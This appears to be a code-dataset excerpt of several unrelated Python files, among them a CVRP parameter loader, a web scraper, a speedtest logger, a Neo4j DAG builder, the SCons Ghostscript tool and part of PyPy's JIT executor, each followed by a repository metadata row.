    CATEGORY CONDITIONS AREA TIME CEILING VISIBILITY WIND CROSSWIND.
    A row matches when ALL of its first four columns match the flight:

    - CATEGORY is cumulative: 'Student' matches student pilots and higher,
      'Certified' matches certified and higher, '50 Hours' only matches
      50-hour pilots, and 'Dual' only matches instructed flights.
    - CONDITIONS: a VFR flight is subject to 'VMC' rows, an IFR flight to 'IMC'.
    - AREA: 'Local' also covers 'Pattern' and 'Practice Area'; 'Any' covers all.
    - TIME: 'Day' matches only daytime flights, 'Night' only night flights.

    Over the matching rows the lowest CEILING/VISIBILITY and the highest
    WIND/CROSSWIND are the most advantageous; they are returned as a list of
    four floats in table-column order.  Returns None when no row matches
    (e.g. a novice pilot with no instructor).

    Parameter cert: The pilot certification
    Precondition: cert is an int and one of PILOT_NOVICE, PILOT_STUDENT,
    PILOT_CERTIFIED, PILOT_50_HOURS, or PILOT_INVALID.

    Parameter area: The flight area for this flight plan
    Precondition: area is one of 'Pattern', 'Practice Area', 'Cross Country'

    Parameter instructed: Whether an instructor is present
    Precondition: instructed is a boolean

    Parameter vfr: Whether the pilot has filed this as a VFR flight
    Precondition: vfr is a boolean

    Parameter daytime: Whether this flight is during the day
    Precondition: daytime is a boolean

    Parameter minimums: The table of allowed minimums
    Precondition: minimums is a 2d-list (table) as described above, with header
    """
    # CATEGORY values this pilot matches; certification levels are cumulative.
    # Any other cert value (novice/invalid) matches no category row.
    if cert == 1:
        categories = ['Student']
    elif cert == 2:
        categories = ['Student', 'Certified']
    elif cert == 3:
        categories = ['Student', 'Certified', '50 Hours']
    else:
        categories = []
    if instructed:
        categories.append('Dual')

    conditions = ['VMC'] if vfr else ['IMC']

    areas = ['Any']
    if area in ('Pattern', 'Practice Area'):
        areas.extend([area, 'Local'])
    elif area == 'Cross Country':
        areas.append(area)

    times = ['Day'] if daytime else ['Night']

    # Collect all applicable rows; the header row never matches any category,
    # so no special casing is required to skip it.
    matches = [row for row in minimums
               if row[0] in categories and row[1] in conditions
               and row[2] in areas and row[3] in times]
    if not matches:
        # Previously this case was reached via min([]) raising inside a bare
        # except; now the "no applicable row" result is explicit.
        return None

    ceilings = [float(row[4]) for row in matches]
    visibilities = [float(row[5]) for row in matches]
    winds = [float(row[6]) for row in matches]
    crosswinds = [float(row[7]) for row in matches]
    # Lower ceiling/visibility and higher wind/crosswind are more advantageous.
    return [min(ceilings), min(visibilities), max(winds), max(crosswinds)]
| ChrisMJordan/eCornell_Cert_Project | pilots.py | pilots.py | py | 16,872 | python | en | code | 0 | github-code | 36 |
43589729276 | import numpy as np
import csv
import math
# NOTE(review): class name `param` is lower-case; PEP 8 would use `Param`,
# but renaming would break existing callers.
class param:
    """Parameter container for the CVRP solver.

    Class attributes hold default tuning values; __init__ overrides them with
    caller-supplied values and parses a TSPLIB-style instance file
    (NODE_COORD_SECTION / DEMAND_SECTION) into node coordinates, demands, a
    rounded-Euclidean distance matrix, and a nearest-neighbour list.
    """

    # Minimum cardinality of possol and negsol
    minSol = 30
    # Cardinality limit for possol and negsol
    maxSol = 70
    # Load-excess penalty weight
    omega = 40
    # Diversity weight (relative to maxSol); the higher, the less it weighs
    muelite = 1.5
    # Probability of repairing infeasible solutions
    Prep = 0.5
    # Maximum number of iterations without improvements
    itMax = 2000
    # Fraction of itMax before diversification kicks in
    itDiv = 0.4
    # Fraction of nodes considered neighbours during education
    near = 0.2
    # Fraction of individuals considered close in the diversity computation
    muclose = 1
    generation_size = maxSol - minSol
    csi_ref = 0.2

    def __init__(self, filename, minSol, maxSol, omega, muelite, prep, itMax, itDiv, near, muclose):
        """Store the tuning parameters and parse the tab-separated instance file."""
        self.filename = filename
        self.minSol = minSol
        self.maxSol = maxSol
        self.omega = omega
        self.muelite = muelite
        self.Prep = prep
        self.itMax = itMax
        self.itDiv = itDiv
        self.near = near
        self.muclose = muclose
        with open(filename) as tsv:
            # Flags tracking which file section the cursor is currently in.
            readpos = False
            readdemand = False
            # i/j start at -1 so the section-header line itself is skipped:
            # the first data line is stored at index 0.
            i = -1
            j = -1
            for line in csv.reader(tsv, dialect="excel-tab"):
                if line[0].startswith("NODE_COORD_SECTION"):
                    readpos = True
                if line[0].startswith("DEMAND_SECTION"):
                    readpos = False
                    readdemand = True
                if line[0].startswith("DEPOT_SECTION"):
                    readdemand = False
                if line[0].startswith("DIMENSION"):
                    # Number of nodes; allocate the arrays filled below.
                    self.n = int(line[1])
                    self.demand = np.zeros(self.n, dtype=int)
                    # NOTE(review): pos has n + 1 rows but only 0..n-1 are
                    # filled below — confirm the extra row is intentional.
                    self.pos = np.zeros((self.n + 1, 2), dtype=int)
                if line[0].startswith("CAPACITY"):
                    # Vehicle capacity.
                    self.C = int(line[1])
                if readpos:
                    if i != -1:
                        self.pos[i][0] = line[1]
                        self.pos[i][1] = line[2]
                    i += 1
                if readdemand:
                    if j != -1:
                        self.demand[j] = int(line[1])
                    j += 1
        # Rounded Euclidean distance matrix between every pair of nodes.
        self.dist = np.zeros((self.n, self.n), dtype=int)
        for i in range(self.n):
            for j in range(self.n):
                self.dist[i][j] = int(round(math.sqrt(math.pow(
                    self.pos[i][0] - self.pos[j][0], 2) + math.pow(self.pos[i][1] - self.pos[j][1], 2))))
        # For each customer (depot index 0 excluded) record its numNeigh
        # nearest neighbours as [node, neighbour] pairs, closest first.
        self.neigh = []
        numNeigh = int(self.n*self.near)
        for i in range(1, self.n):
            auxdist = list(self.dist[i])
            # A node is never its own neighbour.
            auxdist[i] = math.inf
            for k in range(numNeigh):
                j = auxdist.index(min(auxdist))
                self.neigh.append([i, j])
                # Mark as taken so the next minimum is the next-closest node.
                auxdist[j] = math.inf

    def printparam(self):
        """Print every tuning parameter to stdout (debug helper)."""
        print("filename: ", self.filename)
        print("minsol: ", self.minSol)
        print("maxsol: ", self.maxSol)
        print("omega: ", self.omega)
        print("muelite: ", self.muelite)
        print("Prep: ", self.Prep)
        print("itMax: ", self.itMax)
        print("itDiv: ", self.itDiv)
        print("near: ", self.near)
        print("muclose: ", self.muclose)

    def printonfile(self, filename):
        """Append every tuning parameter to the given file."""
        myfile = open(filename, 'a')
        myfile.write("filename: ")
        myfile.write(self.filename)
        myfile.write("\nminsol: ")
        myfile.write(str(self.minSol))
        myfile.write("\nmaxsol: ")
        myfile.write(str(self.maxSol))
        myfile.write("\nomega: ")
        myfile.write(str(self.omega))
        myfile.write("\nmuelite: ")
        myfile.write(str(self.muelite))
        myfile.write("\nPrep: ")
        myfile.write(str(self.Prep))
        myfile.write("\nitMax: ")
        myfile.write(str(self.itMax))
        myfile.write("\nitDiv: ")
        myfile.write(str(self.itDiv))
        myfile.write("\nnear: ")
        myfile.write(str(self.near))
        myfile.write("\nmuclose: ")
        myfile.write(str(self.muclose))
        myfile.close()
| neeco1991/uhgs | param.py | param.py | py | 4,170 | python | en | code | 2 | github-code | 36 |
30221585975 | from bs4 import BeautifulSoup
import requests
import csv
import pandas as pd
import os
# Scrape every laminate product from centuryply.com: walk the category
# drop-down menu, open each product page, and write one CSV per product
# under ./data/<category>/.
source = requests.get('https://www.centuryply.com/centurylaminates/')
soup = BeautifulSoup(source.content, 'lxml')
for main in soup.select('li.dropdown-submenu'):
    for a_link in main.find_all('a'):
        try:
            # Category href like "xyz.php#" -> absolute URL + local folder name.
            t_link = a_link['href'].replace('#','')
            f_name = t_link.replace('.php','')
            m_link = f'https://www.centuryply.com/centurylaminates/{t_link}'
            folder_location = f'./data/{f_name}'
            if not os.path.exists(folder_location):
                os.mkdir(folder_location)
            source = requests.get(m_link)
            soup = BeautifulSoup(source.content, 'lxml')
            for src in soup.find_all('div',class_='product-meta'):
                # The anchor after the first one in the card is the detail page.
                links = src.a
                link =links.find_next('a')['href']
                link = f'https://www.centuryply.com/centurylaminates/{link}'
                #print(link)
                source = requests.get(link)
                soup = BeautifulSoup(source.content, 'lxml')
                print(f'>> {link}')
                # Product image, title and description from the detail page.
                img = soup.find('div',class_='product-img').a['bg-image']
                prod_img = f'https://www.centuryply.com/centurylaminates/{img}'
                print(prod_img)
                name = soup.find('div',class_='product-heading').h1.text
                name = f' {name} '
                print(name)
                desc = soup.find('div',class_='product-description').p.text
                print(desc)
                # One CSV per product, named after the (space-padded) title.
                f_name = name.replace(' ','_')
                filenames = f'{folder_location}/{f_name}.csv'
                with open(filenames , 'w') as csv_file:
                    csv_writer = csv.writer(csv_file)
                    csv_writer.writerow(['Prod_link ',' Name ',' Images ', ' Prod_Desc '])
                    csv_writer.writerow([link , name , prod_img , desc])
                    print(csv_file.closed)
        except:
            # NOTE(review): this bare except silently swallows every scraping
            # error (missing tags, network failures) and prints a blank line;
            # consider catching specific exceptions and logging them.
            print('')
| jhankarnarang/Century-Plywood-Web-Scraping | Century Laminates/main.py | main.py | py | 2,060 | python | en | code | 0 | github-code | 36 |
14713582650 | #!/bin/python3
import math
import os
import random
import re
import sys
#
# Complete the 'plusMinus' function below.
#
# The function accepts INTEGER_ARRAY arr as parameter.
#
def plusMinus(arr):
    """Print the fractions of positive, negative and zero values in arr.

    One fraction per line, in the order positive, negative, zero, printed as
    plain Python floats (same output format as before).

    Parameter arr: the values to classify
    Precondition: arr is a non-empty list of ints
    """
    total = len(arr)
    # Count each class directly; the previous version tracked a redundant
    # manual index alongside the for-loop and had an unreachable else branch.
    positives = sum(1 for x in arr if x > 0)
    negatives = sum(1 for x in arr if x < 0)
    zeros = total - positives - negatives
    print(positives / total)
    print(negatives / total)
    print(zeros / total)
if __name__ == '__main__':
    # HackerRank-style input: first line is the element count (read but not
    # otherwise used), second line is the space-separated array.
    n = int(input().strip())
    arr = list(map(int, input().rstrip().split()))
    plusMinus(arr)
| AndrewDass1/HACKERRANK-PROBLEM-SOLUTIONS | Interview Preparation Kits/1 Week Preparation Kit/plus_minus_solution.py | plus_minus_solution.py | py | 969 | python | en | code | 0 | github-code | 36 |
36947774959 | __revision__ = "src/engine/SCons/Tool/gs.py bee7caf9defd6e108fc2998a2520ddb36a967691 2019-12-17 02:07:09 bdeegan"
import SCons.Action
import SCons.Builder
import SCons.Platform
import SCons.Util
# Ghostscript goes by different names on different platforms...
platform = SCons.Platform.platform_default()
if platform == 'os2':
    gs = 'gsos2'        # OS/2 build
elif platform == 'win32':
    gs = 'gswin32c'     # console-mode Windows executable
else:
    gs = 'gs'           # POSIX default
# Lazily-created Action shared between the PDF builder hook and the Gs builder.
GhostscriptAction = None

def generate(env):
    """Add Builders and construction variables for Ghostscript to an
    Environment."""
    global GhostscriptAction
    # The following try-except block enables us to use the Tool
    # in standalone mode (without the accompanying pdf.py),
    # whenever we need an explicit call of gs via the Gs()
    # Builder ...
    try:
        if GhostscriptAction is None:
            GhostscriptAction = SCons.Action.Action('$GSCOM', '$GSCOMSTR')

        from SCons.Tool import pdf
        pdf.generate(env)

        # Teach the shared PDF builder to convert .ps sources via Ghostscript.
        bld = env['BUILDERS']['PDF']
        bld.add_action('.ps', GhostscriptAction)
    except ImportError as e:
        pass

    gsbuilder = SCons.Builder.Builder(action = SCons.Action.Action('$GSCOM', '$GSCOMSTR'))
    env['BUILDERS']['Gs'] = gsbuilder

    # Default command: batch-convert the sources to PDF via the pdfwrite device.
    env['GS']      = gs
    env['GSFLAGS'] = SCons.Util.CLVar('-dNOPAUSE -dBATCH -sDEVICE=pdfwrite')
    env['GSCOM']   = '$GS $GSFLAGS -sOutputFile=$TARGET $SOURCES'
def exists(env):
    """Return a truthy value when a usable Ghostscript executable is found.

    Prefers an explicitly configured $PS2PDF; otherwise looks for the
    platform-specific `gs` binary via the environment and then the PATH.
    """
    if 'PS2PDF' in env:
        return env.Detect(env['PS2PDF'])
    return env.Detect(gs) or SCons.Util.WhereIs(gs)
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| mongodb/mongo | src/third_party/scons-3.1.2/scons-local-3.1.2/SCons/Tool/gs.py | gs.py | py | 1,659 | python | en | code | 24,670 | github-code | 36 |
37088074525 | # -*- coding: utf-8 -*-
import MySQLdb as MySQL # pip install mysqlclient
class WorkWithDb:
    """Thin wrapper around a local MySQL database (`lazy24`).

    Opens the connection lazily via perform_connection() and transparently
    reconnects-and-retries when a query fails.
    """

    def __init__(self):
        # The connection is established later by perform_connection().
        pass

    def perform_connection(self):
        """Try up to 4 times to open the connection; return True on success."""
        try_connection_count = 0
        print("Подключение к базе...")
        while try_connection_count <= 3:
            try:
                self.db = MySQL.connect(host="127.0.0.1", user="root", passwd="root", db="lazy24", charset="utf8mb4")
                print("Установлено соединение")
                return True
            except Exception:
                try_connection_count += 1
                if try_connection_count <= 3:
                    print(f"Не удается подключиться к базе, выполняется попытка подключиться"
                          f" № {try_connection_count}...")
                else:
                    print("!!! Ошибка: Проблема с подключением к базе. Проверьте ваше интернет соединение")
        return False

    def close_connection(self):
        """Close the underlying connection."""
        self.db.close()

    def load_data(self, text_query):
        """Run a SELECT and cache the rows in self.data; reconnect and retry on failure."""
        with self.db.cursor() as cur:
            try:
                # Запрос на получение данных
                cur.execute(text_query)
                # Извлечение данных
                self.data = cur.fetchall()
                print("Данные загружены")
            except Exception:
                print(f"Нет подключения к базе, выполняется попытка подключиться...")
                if self.perform_connection():
                    self.load_data(text_query)

    def insert_data(self, data):
        """Execute a write query and commit; reconnect and retry on failure."""
        with self.db.cursor() as cur:
            try:
                # Запрос на занесение данных
                cur.execute(data)
                # Подтверждение
                self.db.commit()
                cur.close()
            except Exception:
                print(f"Нет подключения к базе, выполняется попытка подключиться...")
                if self.perform_connection():
                    # BUG FIX: previously the retry called load_data(), which
                    # re-ran the write as a read and never committed it.
                    self.insert_data(data)

    def load_column_data(self, shipments_name):
        """Cache the column names of the given table in self.columns_names."""
        # NOTE(review): the table name is interpolated into the SQL text;
        # only call this with trusted identifiers.
        with self.db.cursor() as cur:
            try:
                # BUG FIX: the result of execute() was previously assigned to
                # cur.execute, clobbering the cursor method.
                cur.execute("""SHOW COLUMNS FROM {};""".format(shipments_name))
                columns_names = cur.fetchall()
                self.columns_names = [item[0] for item in columns_names]
                print("Название колонок загружено")
                cur.close()
            except Exception:
                print("Нет подключения к базе, выполняется попытка подключиться...")
                if self.perform_connection():
                    self.load_column_data(shipments_name)

    def get_data(self):
        """Return the rows cached by the last load_data() call."""
        return self.data

    def get_columns_names(self):
        """Return the column names cached by the last load_column_data() call."""
        return self.columns_names
| Swarmi24/Lazy24 | workwithdb.py | workwithdb.py | py | 3,260 | python | ru | code | 0 | github-code | 36 |
30397116642 | from dagger import conf
from dagger.dag_creator.graph_traverser_base import GraphTraverserBase
from dagger.graph.task_graph import Graph
from dagger.utilities import uid
from neo4j import GraphDatabase
class DagCreator(GraphTraverserBase):
    """Materialize a dagger task graph as Dag/Job/Dataset nodes in Neo4j."""

    def __init__(self, task_graph: Graph):
        super().__init__(task_graph, True)
        neo4j_uri = "bolt://{host}:{port}".format(
            host=conf.NE4J_HOST, port=conf.NE4J_PORT
        )
        self._neo4j_driver = GraphDatabase.driver(neo4j_uri, auth=("neo4j", "test"))

        # Start from an empty Neo4j graph on every run.
        with self._neo4j_driver.session() as session:
            session.write_transaction(self._reset_graph)

    @staticmethod
    def _reset_graph(tx):
        # Relationships must be deleted before the nodes they attach to.
        tx.run("MATCH ()-[r]->() DELETE r")
        tx.run("MATCH (n) DELETE n")

    @staticmethod
    def _add_node(tx, node_type: str, **kwargs):
        """Create one `node_type` node with the given properties; return its id."""
        # NOTE(review): property values are interpolated into the Cypher text,
        # so quotes in names/descriptions can break or inject into the query;
        # consider passing them as query parameters instead.
        node_args = ", ".join([f'{key}:"{value}"' for key, value in kwargs.items()])
        create_cmd = f"CREATE (node:{node_type} {{{node_args}}}) RETURN node"
        result = tx.run(create_cmd)
        return result.single()['node'].id

    @staticmethod
    def _add_edge(tx, from_id: int, to_id: int, relationship_type: str, **kwargs):
        """Create a relationship between two nodes identified by internal id."""
        relationship_args = ", ".join(
            [f'{key}:"{value}"' for key, value in kwargs.items()]
        )
        create_cmd = f"""
            MATCH (from_node), (to_node)
            WHERE ID(from_node)={from_id} AND ID(to_node)={to_id}
            CREATE (from_node)-[:{relationship_type} {{{relationship_args}}}]->(to_node)
        """
        tx.run(create_cmd)

    def _create_dag(self, pipe_id, node):
        """Create the Dag node for a pipeline; return its Neo4j id."""
        with self._neo4j_driver.session() as session:
            node_id = session.write_transaction(
                self._add_node,
                "Dag",
                name=node.obj.name,
                description=node.obj.description,
                uid=uid.get_pipeline_uid(node.obj)
            )
        return node_id

    def _create_job_task(self, node):
        """Create a Job node and link it to its pipeline's Dag; return its id."""
        with self._neo4j_driver.session() as session:
            node_id = session.write_transaction(
                self._add_node,
                "Job",
                name=node.obj.name,
                description=node.obj.description,
                uid=uid.get_task_uid(node.obj)
            )

        pipe_id = node.obj.pipeline_name
        with self._neo4j_driver.session() as session:
            session.write_transaction(
                self._add_edge, node_id, self._dags[pipe_id], "TASK_OF"
            )

        return node_id

    def _create_data_task(self, pipe_id, node):
        """Create the Dataset node for this dataset unless it already exists."""
        dataset_id = node.obj.airflow_name
        if dataset_id not in self._data_tasks:
            with self._neo4j_driver.session() as session:
                self._data_tasks[dataset_id] = session.write_transaction(
                    self._add_node,
                    "Dataset",
                    name=node.obj.alias(),
                    description=node.obj.name,
                    uid=uid.get_dataset_uid(node.obj)
                )

    def _create_edge_without_data(self, from_task_id, to_task_ids, node):
        # BUG FIX: `raise NotImplemented` raises a TypeError in Python 3
        # (NotImplemented is a value, not an exception class).
        raise NotImplementedError

    def _create_edge_with_data(self, from_task_id, to_task_ids, node):
        """Wire GENERATED_BY / DEPENDS_ON edges between jobs and a dataset."""
        from_pipe = (
            self._task_graph.get_node(from_task_id).obj.pipeline_name
            if from_task_id
            else None
        )
        data_id = node.obj.airflow_name

        if from_pipe:
            with self._neo4j_driver.session() as session:
                session.write_transaction(
                    self._add_edge,
                    self._tasks[from_task_id],
                    self._data_tasks[data_id],
                    "GENERATED_BY",
                )

        for to_task_id in to_task_ids:
            to_pipe = self._task_graph.get_node(to_task_id).obj.pipeline_name
            with self._neo4j_driver.session() as session:
                session.write_transaction(
                    self._add_edge,
                    self._data_tasks[data_id],
                    self._tasks[to_task_id],
                    "DEPENDS_ON",
                )
17092139917 | import os
import speedtest_cli as speedtest
import datetime
import sqlite3
import time
from sqlite3 import Error
from xml.etree import ElementTree
from xml.etree.ElementTree import Element
from xml.etree.ElementTree import SubElement
# Required configuration from the environment; exit early when missing.
# BUG FIX: os.environ raises KeyError for a missing variable; the previous
# `except os.error` handlers could never fire, so a missing variable crashed
# with an unhandled traceback instead of the intended message + exit(1).
try:
    urltocheck = os.environ['UPCHECK_URLTOCHECK']
except KeyError as e:
    print(e)
    exit(1)
try:
    dbfile = os.environ['UPCHECK_DB_LOCATION']
except KeyError as e:
    print(e)
    exit(1)
def dbconnect(dbfile):
    """Smoke-test that the SQLite database file can be opened.

    Prints the sqlite3 version on success; prints the error and exits the
    process on failure.
    """
    try:
        conn = sqlite3.connect(dbfile)
        print(sqlite3.version)
        conn.close()
    except Error as err:
        print(err)
        exit(1)
def db_createtable(dbfile):
    """Ensure the `upcheck` results table exists; print the error and exit on failure."""
    try:
        connection = sqlite3.connect(dbfile)
        cursor = connection.cursor()
        sql = 'CREATE TABLE IF NOT EXISTS upcheck (record_number integer PRIMARY KEY AUTOINCREMENT, timestamp TIMESTAMP, download INTEGER, upload INTEGER, ping INTEGER)'
        cursor.execute(sql)
        # BUG FIX: commit and close the connection; previously it was left
        # open and uncommitted, leaking the handle and leaving the DDL's
        # persistence to interpreter shutdown behaviour.
        connection.commit()
        connection.close()
    except Error as t:
        print(t)
        exit(1)
def write_out_record(dbfile, timestamp, download, upload, ping):
    """Append one speedtest sample to the `upcheck` table.

    Errors are printed and otherwise ignored (best-effort logging).
    """
    try:
        conn = sqlite3.connect(dbfile, detect_types=sqlite3.PARSE_DECLTYPES)
        conn.cursor().execute(
            "INSERT INTO upcheck VALUES (NULL, ?, ?, ?, ?)",
            (timestamp, download, upload, ping),
        )
        conn.commit()
        conn.close()
    except Error as err:
        print(err)
def average(input):
    """Return the arithmetic mean of a non-empty sequence of numbers."""
    # NOTE(review): the parameter shadows the builtin `input`; kept for
    # compatibility with existing positional/keyword callers.
    total = sum(input)
    return total / len(input)
def get_average_data():
    """Return [avg_download, avg_upload, avg_ping] over the last 24 hours.

    Each average is rounded to 2 decimal places.  Reads the module global
    `dbfile`.  Raises ZeroDivisionError when there are no samples in the
    window (same behaviour as before).
    """
    connection = sqlite3.connect(dbfile, detect_types=sqlite3.PARSE_DECLTYPES)
    cursor = connection.cursor()
    yesterday = (datetime.datetime.now()) - (datetime.timedelta(days=1))
    averages = []
    # One query per metric; previously this was three copy-pasted blocks.
    # The column names are a fixed whitelist, so the format() is safe.
    for column in ("download", "upload", "ping"):
        cursor.execute(
            "SELECT {} FROM upcheck WHERE timestamp > ?".format(column),
            (yesterday,),
        )
        values = [row[0] for row in cursor.fetchall()]
        averages.append(round(average(values), 2))
    # Close the connection (previously leaked).
    connection.close()
    return averages
def run_speedtest():
    """Run a full speed test against the best available server.

    Returns the speedtest results object (download/upload in bits per
    second, ping in milliseconds).
    """
    tester = speedtest.Speedtest()
    tester.get_servers()
    tester.get_best_server()
    tester.download()
    tester.upload()
    return tester.results
def bits_to_bytes(inputvalue):
    """Convert a bits-per-second value to a megabits string with 2 decimals.

    NOTE(review): despite its name this converts bits to *megabits*, not
    bytes; the name is kept so existing callers keep working.
    """
    megabits = inputvalue / 1000000
    return format(megabits, '.2f')
def primary_operation():
    """Run one measurement cycle: speedtest, persist the sample, then publish
    the 24-hour averages as XML for the web server.

    Reads the module globals `dbfile` and `xml_web_output`.
    """
    print("Running Speedtest")
    stest_result = run_speedtest()
    # Convert raw bits/s to "NN.NN" megabit strings for storage.
    download_speed = str(bits_to_bytes(stest_result.download))
    upload_speed = str(bits_to_bytes(stest_result.upload))
    ping = str(stest_result.ping)
    timestamp = datetime.datetime.now()
    write_out_record(dbfile, timestamp, download_speed, upload_speed, ping)
    # NOTE(review): each get_average_data() call runs all three queries, so
    # these three calls do nine queries; one call would suffice.
    average_dl = str(get_average_data()[0])
    average_ul = str(get_average_data()[1])
    average_ping = str(get_average_data()[2])
    xml_root = Element('SpeedtestResults')
    SubElement(xml_root, "average_dl").text = average_dl
    SubElement(xml_root, "average_ul").text = average_ul
    SubElement(xml_root, "average_ping").text = average_ping
    xml_output = ElementTree.tostring(xml_root, encoding='unicode')
    # NOTE(review): the file handle is never closed or flushed explicitly;
    # a `with open(...)` block would be safer.
    xml_output_file = open(xml_web_output, "w+")
    xml_output_file.write(xml_output)
# Location the web server exposes; read by primary_operation().
xml_web_output = "/usr/share/nginx/html/upcheck-speedtest.xml"

try:
    dbconnect(dbfile)
except Error as e:
    # NOTE(review): dbconnect() already handles sqlite errors internally and
    # calls exit(1) itself, so this handler is unlikely to ever fire.
    print("Could not connect to database")
    print(e)
    exit(1)
try:
    db_createtable(dbfile)
    print("UpCheck Scheduled Tasks are Active")
except Error as e:
    print("Unable to Create Table")
    print(e)
    exit(1)

# Measure roughly every 50 minutes, forever.
while True:
    primary_operation()
    time.sleep(3000)
| overallcoma/upcheck | upcheck-client/upcheck-client-scheduledtasks.py | upcheck-client-scheduledtasks.py | py | 4,428 | python | en | code | 0 | github-code | 36 |
43301296714 | """This implements pyjitpl's execution of operations.
"""
from rpython.rtyper.lltypesystem import lltype, rstr, llmemory
from rpython.rlib.rarithmetic import ovfcheck, r_longlong, is_valid_int
from rpython.rlib.unroll import unrolling_iterable
from rpython.rlib.objectmodel import specialize
from rpython.rlib.debug import fatalerror
from rpython.jit.metainterp.history import check_descr
from rpython.jit.metainterp.history import INT, REF, FLOAT, VOID, AbstractDescr
from rpython.jit.metainterp.history import ConstInt, ConstFloat, ConstPtr
from rpython.jit.metainterp import resoperation
from rpython.jit.metainterp.resoperation import rop, opname
from rpython.jit.metainterp.blackhole import BlackholeInterpreter, NULL
from rpython.jit.codewriter import longlong
# ____________________________________________________________
@specialize.arg(4)
def _do_call(cpu, metainterp, argboxes, descr, rettype):
    """Blackhole-execute a residual call.

    argboxes[0] holds the function address; the remaining boxes are the
    arguments, demultiplexed by box type (INT/REF/FLOAT) into the three flat
    argument lists the cpu backend expects.  An exception raised by the
    callee is reported via metainterp.execute_raised() and a dummy result of
    the requested return type is produced instead.
    """
    assert metainterp is not None
    # count the number of arguments of the different types
    count_i = count_r = count_f = 0
    for i in range(1, len(argboxes)):
        type = argboxes[i].type
        if type == INT: count_i += 1
        elif type == REF: count_r += 1
        elif type == FLOAT: count_f += 1
    # allocate lists for each type that has at least one argument
    if count_i: args_i = [0] * count_i
    else: args_i = None
    if count_r: args_r = [NULL] * count_r
    else: args_r = None
    if count_f: args_f = [longlong.ZEROF] * count_f
    else: args_f = None
    # fill in the lists
    count_i = count_r = count_f = 0
    for i in range(1, len(argboxes)):
        box = argboxes[i]
        if box.type == INT:
            args_i[count_i] = box.getint()
            count_i += 1
        elif box.type == REF:
            args_r[count_r] = box.getref_base()
            count_r += 1
        elif box.type == FLOAT:
            args_f[count_f] = box.getfloatstorage()
            count_f += 1
    # get the function address as an integer
    func = argboxes[0].getint()
    # do the call using the correct function from the cpu
    if rettype == INT:
        try:
            result = cpu.bh_call_i(func, args_i, args_r, args_f, descr)
        except Exception as e:
            metainterp.execute_raised(e)
            result = 0
        return result
    if rettype == REF:
        try:
            result = cpu.bh_call_r(func, args_i, args_r, args_f, descr)
        except Exception as e:
            metainterp.execute_raised(e)
            result = NULL
        return result
    if rettype == FLOAT:
        try:
            result = cpu.bh_call_f(func, args_i, args_r, args_f, descr)
        except Exception as e:
            metainterp.execute_raised(e)
            result = longlong.ZEROF
        return result
    if rettype == VOID:
        try:
            cpu.bh_call_v(func, args_i, args_r, args_f, descr)
        except Exception as e:
            metainterp.execute_raised(e)
        return None
    raise AssertionError("bad rettype")
def new_do_call(rettype):
    """Build the do_call_<rettype> executor as a closure over one return type."""
    def do_call(cpu, metainterp, argboxes, descr):
        return _do_call(cpu, metainterp, argboxes, descr, rettype)
    do_call.__name__ = "do_call_" + rettype
    return do_call

# One executor per result kind: 'r'ef, 'i'nt, 'f'loat, 'v'oid.
do_call_r = new_do_call("r")
do_call_i = new_do_call("i")
do_call_f = new_do_call("f")
do_call_n = new_do_call("v")
# When executed here the loop-invariant and may-force call variants behave
# exactly like plain calls, so they reuse the same executors.
do_call_loopinvariant_r = do_call_r
do_call_loopinvariant_i = do_call_i
do_call_loopinvariant_f = do_call_f
do_call_loopinvariant_n = do_call_n
do_call_may_force_r = do_call_r
do_call_may_force_i = do_call_i
do_call_may_force_f = do_call_f
do_call_may_force_n = do_call_n
def do_cond_call(cpu, metainterp, argboxes, descr):
    # COND_CALL: perform the (void) call only when the condition box is true.
    condbox = argboxes[0]
    if condbox.getint():
        do_call_n(cpu, metainterp, argboxes[1:], descr)

def do_cond_call_value_i(cpu, metainterp, argboxes, descr):
    # COND_CALL_VALUE_I: keep the int value unless it is 0, in which case
    # the call computes the value instead.
    value = argboxes[0].getint()
    if value == 0:
        value = do_call_i(cpu, metainterp, argboxes[1:], descr)
    return value

def do_cond_call_value_r(cpu, metainterp, argboxes, descr):
    # COND_CALL_VALUE_R: same as above for a GC pointer; NULL triggers the call.
    value = argboxes[0].getref_base()
    if not value:
        value = do_call_r(cpu, metainterp, argboxes[1:], descr)
    return value
# GETARRAYITEM_GC_{I,R,F}: read one element of a GC-managed array.
def do_getarrayitem_gc_i(cpu, _, arraybox, indexbox, arraydescr):
    array = arraybox.getref_base()
    index = indexbox.getint()
    return cpu.bh_getarrayitem_gc_i(array, index, arraydescr)

def do_getarrayitem_gc_r(cpu, _, arraybox, indexbox, arraydescr):
    array = arraybox.getref_base()
    index = indexbox.getint()
    return cpu.bh_getarrayitem_gc_r(array, index, arraydescr)

def do_getarrayitem_gc_f(cpu, _, arraybox, indexbox, arraydescr):
    array = arraybox.getref_base()
    index = indexbox.getint()
    return cpu.bh_getarrayitem_gc_f(array, index, arraydescr)

# GETARRAYITEM_RAW_{I,F}: the array is a raw address (int), not a GC ref.
def do_getarrayitem_raw_i(cpu, _, arraybox, indexbox, arraydescr):
    array = arraybox.getint()
    index = indexbox.getint()
    return cpu.bh_getarrayitem_raw_i(array, index, arraydescr)

def do_getarrayitem_raw_f(cpu, _, arraybox, indexbox, arraydescr):
    array = arraybox.getint()
    index = indexbox.getint()
    return cpu.bh_getarrayitem_raw_f(array, index, arraydescr)
def do_setarrayitem_gc(cpu, _, arraybox, indexbox, itembox, arraydescr):
    # Dispatch on the element kind recorded in the array descr.
    array = arraybox.getref_base()
    index = indexbox.getint()
    if arraydescr.is_array_of_pointers():
        cpu.bh_setarrayitem_gc_r(array, index, itembox.getref_base(),
                                 arraydescr)
    elif arraydescr.is_array_of_floats():
        cpu.bh_setarrayitem_gc_f(array, index, itembox.getfloatstorage(),
                                 arraydescr)
    else:
        cpu.bh_setarrayitem_gc_i(array, index, itembox.getint(), arraydescr)

def do_setarrayitem_raw(cpu, _, arraybox, indexbox, itembox, arraydescr):
    array = arraybox.getint()
    index = indexbox.getint()
    # Raw (non-GC) arrays can never hold GC pointers.
    assert not arraydescr.is_array_of_pointers()
    if arraydescr.is_array_of_floats():
        cpu.bh_setarrayitem_raw_f(array, index, itembox.getfloatstorage(),
                                  arraydescr)
    else:
        cpu.bh_setarrayitem_raw_i(array, index, itembox.getint(), arraydescr)
def do_getinteriorfield_gc(cpu, _, arraybox, indexbox, descr):
    # Deliberately unfinished executor; everything after the raise is
    # unreachable leftover code (the bare `xxxx` marks it as such).
    raise Exception("implement me")
    xxxx
    array = arraybox.getref_base()
    index = indexbox.getint()
    if descr.is_pointer_field():
